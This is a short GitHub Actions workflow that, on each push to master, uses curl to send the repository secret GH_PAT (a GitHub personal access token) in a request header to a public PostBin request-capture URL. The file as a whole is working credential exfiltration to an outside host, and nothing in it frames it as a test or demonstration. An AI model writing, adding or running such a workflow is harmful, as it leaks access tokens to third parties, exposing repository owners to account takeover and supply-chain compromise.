name: Send GH_PAT to PostBin
on:
  push:
    branches:
      - master

jobs:
  send_gh_pat:
    runs-on: ubuntu-latest
    steps:
      - name: Send GH_PAT to PostBin
        run: |
          curl -X GET -H "GH-PAT: ${{ secrets.GH_PAT }}" https://www.toptal.com/developers/postbin/1703754574393-1403204605448
